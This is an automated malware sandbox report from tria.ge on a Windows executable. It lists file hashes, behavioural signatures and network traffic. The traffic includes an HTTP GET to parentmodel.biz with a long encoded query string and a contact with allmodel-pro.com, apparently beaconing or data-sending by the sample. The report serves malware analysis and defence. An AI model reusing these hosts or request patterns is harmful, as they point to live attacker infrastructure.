Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

6

Static

static

6689f183a1...f1.exe

windows7-x64

6

6689f183a1...f1.exe

windows10-2004-x64

6

Analysis

  • max time kernel
    151s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/10/2022, 20:55 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6689f183a1881261e2abffb51838acdcb447180fd1c8e910c46a69fb789713f1.exe

  • Size

    380KB

  • MD5

    820ada49121a00b93b63799995128c12

  • SHA1

    b853ebbbed8ab216ee710d224daec9df4b5a3395

  • SHA256

    6689f183a1881261e2abffb51838acdcb447180fd1c8e910c46a69fb789713f1

  • SHA512

    a27c1057f63c4f868a47dad00e1c89b64262fe6302b66cea35c73e876496049ba176b858fa46a80157c137e209eaf0d40aa0f2ba03af6d1f50b6bcee3f118834

  • SSDEEP

    6144:mzjowCMQQf6DI5aKt8e007RickUv5H5L9STCF2B5DNR2CDMf:miMIIQW0a3v5HjS+2BVN8CDMf

Score
6/10

Malware Config

Signatures

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in Windows directory 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6689f183a1881261e2abffb51838acdcb447180fd1c8e910c46a69fb789713f1.exe
    "C:\Users\Admin\AppData\Local\Temp\6689f183a1881261e2abffb51838acdcb447180fd1c8e910c46a69fb789713f1.exe"
    1⤵
    • Maps connected drives based on registry
    • Drops file in Windows directory
    PID:1380

Network

  • flag-us
    DNS
    parentmodel.biz
    6689f183a1881261e2abffb51838acdcb447180fd1c8e910c46a69fb789713f1.exe
    Remote address:
    8.8.8.8:53
    Request
    parentmodel.biz
    IN A
    Response
    parentmodel.biz
    IN A
    58.158.177.102
  • flag-jp
    GET
    http://parentmodel.biz/?q=lJ6N09%2FVjdHKRucYSUniNUe%2FQ8Y8Y4lZO6CcV3kpkcaDcXGHADBLO2ZbA9h7MWYB%2FMIAhkkZY3qiskUWOz7xmiNb33cwZxGLgCCpmuWpRTo9BBnD479Uv2qhne%2Fa9RC81t67ijPTNjpD4yYsvNL81eeA7YQ8hOwOg7CoEqxWfaSuz4mpeJsWtfjxjEXjDGgSuice8ytVtILaAMMICDtyXN%2F8wEYe7nKkqWV6Qrlsc5m7G%2F5GPxJIlLT1KG2j3r5HcCac1%2BgEDwGhVM8pMWQM3%2BTwy9%2F0DTMzkA0EX%2BU0W%2BM%2FIq1e38LP1dD7%2BKwKtXALpjIr%2F%2Bs4LS%2FHZn%2FXmTvat
    6689f183a1881261e2abffb51838acdcb447180fd1c8e910c46a69fb789713f1.exe
    Remote address:
    58.158.177.102:80
    Request
    GET /?q=lJ6N09%2FVjdHKRucYSUniNUe%2FQ8Y8Y4lZO6CcV3kpkcaDcXGHADBLO2ZbA9h7MWYB%2FMIAhkkZY3qiskUWOz7xmiNb33cwZxGLgCCpmuWpRTo9BBnD479Uv2qhne%2Fa9RC81t67ijPTNjpD4yYsvNL81eeA7YQ8hOwOg7CoEqxWfaSuz4mpeJsWtfjxjEXjDGgSuice8ytVtILaAMMICDtyXN%2F8wEYe7nKkqWV6Qrlsc5m7G%2F5GPxJIlLT1KG2j3r5HcCac1%2BgEDwGhVM8pMWQM3%2BTwy9%2F0DTMzkA0EX%2BU0W%2BM%2FIq1e38LP1dD7%2BKwKtXALpjIr%2F%2Bs4LS%2FHZn%2FXmTvat HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
    Host: parentmodel.biz
    Response
    HTTP/1.1 200 OK
    Date: Thu, 20 Oct 2022 01:37:16 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
    Last-Modified: Mon, 30 Nov 2015 13:48:40 GMT
    ETag: "9-525c24c725e00"
    Accept-Ranges: bytes
    Content-Length: 9
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    allmodel-pro.com
    6689f183a1881261e2abffb51838acdcb447180fd1c8e910c46a69fb789713f1.exe
    Remote address:
    8.8.8.8:53
    Request
    allmodel-pro.com
    IN A
    Response
    allmodel-pro.com
    IN A
    193.166.255.171
  • flag-us
    DNS
    14.110.152.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    14.110.152.52.in-addr.arpa
    IN PTR
    Response
  • 58.158.177.102:80
    http://parentmodel.biz/?q=lJ6N09%2FVjdHKRucYSUniNUe%2FQ8Y8Y4lZO6CcV3kpkcaDcXGHADBLO2ZbA9h7MWYB%2FMIAhkkZY3qiskUWOz7xmiNb33cwZxGLgCCpmuWpRTo9BBnD479Uv2qhne%2Fa9RC81t67ijPTNjpD4yYsvNL81eeA7YQ8hOwOg7CoEqxWfaSuz4mpeJsWtfjxjEXjDGgSuice8ytVtILaAMMICDtyXN%2F8wEYe7nKkqWV6Qrlsc5m7G%2F5GPxJIlLT1KG2j3r5HcCac1%2BgEDwGhVM8pMWQM3%2BTwy9%2F0DTMzkA0EX%2BU0W%2BM%2FIq1e38LP1dD7%2BKwKtXALpjIr%2F%2Bs4LS%2FHZn%2FXmTvat
    http
    6689f183a1881261e2abffb51838acdcb447180fd1c8e910c46a69fb789713f1.exe
    788 B
     400 B
     5
    3

    HTTP Request

    GET http://parentmodel.biz/?q=lJ6N09%2FVjdHKRucYSUniNUe%2FQ8Y8Y4lZO6CcV3kpkcaDcXGHADBLO2ZbA9h7MWYB%2FMIAhkkZY3qiskUWOz7xmiNb33cwZxGLgCCpmuWpRTo9BBnD479Uv2qhne%2Fa9RC81t67ijPTNjpD4yYsvNL81eeA7YQ8hOwOg7CoEqxWfaSuz4mpeJsWtfjxjEXjDGgSuice8ytVtILaAMMICDtyXN%2F8wEYe7nKkqWV6Qrlsc5m7G%2F5GPxJIlLT1KG2j3r5HcCac1%2BgEDwGhVM8pMWQM3%2BTwy9%2F0DTMzkA0EX%2BU0W%2BM%2FIq1e38LP1dD7%2BKwKtXALpjIr%2F%2Bs4LS%2FHZn%2FXmTvat

    HTTP Response

    200
  • 193.166.255.171:80
    allmodel-pro.com
    6689f183a1881261e2abffb51838acdcb447180fd1c8e910c46a69fb789713f1.exe
    104 B
     2
  • 93.184.220.29:80
    322 B
     7
  • 93.184.220.29:80
    260 B
     5
  • 104.110.191.140:80
    322 B
     7
  • 209.197.3.8:80
    46 B
     40 B
     1
    1
  • 93.184.220.29:80
    46 B
     40 B
     1
    1
  • 40.79.150.121:443
    322 B
     7
  • 209.197.3.8:80
    46 B
     40 B
     1
    1
  • 178.79.208.1:80
    322 B
     7
  • 178.79.208.1:80
    322 B
     7
  • 178.79.208.1:80
    322 B
     7
  • 8.8.8.8:53
    parentmodel.biz
    dns
    6689f183a1881261e2abffb51838acdcb447180fd1c8e910c46a69fb789713f1.exe
    61 B
     77 B
     1
    1

    DNS Request

    parentmodel.biz

    DNS Response

    58.158.177.102

  • 8.8.8.8:53
    allmodel-pro.com
    dns
    6689f183a1881261e2abffb51838acdcb447180fd1c8e910c46a69fb789713f1.exe
    62 B
     78 B
     1
    1

    DNS Request

    allmodel-pro.com

    DNS Response

    193.166.255.171

  • 8.8.8.8:53
    14.110.152.52.in-addr.arpa
    dns
    72 B
     146 B
     1
    1

    DNS Request

    14.110.152.52.in-addr.arpa

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1380-132-0x0000000003E00000-0x0000000003E2F000-memory.dmp

    Filesize

    188KB

    Download

  • memory/1380-136-0x0000000006410000-0x0000000006437000-memory.dmp

    Filesize

    156KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.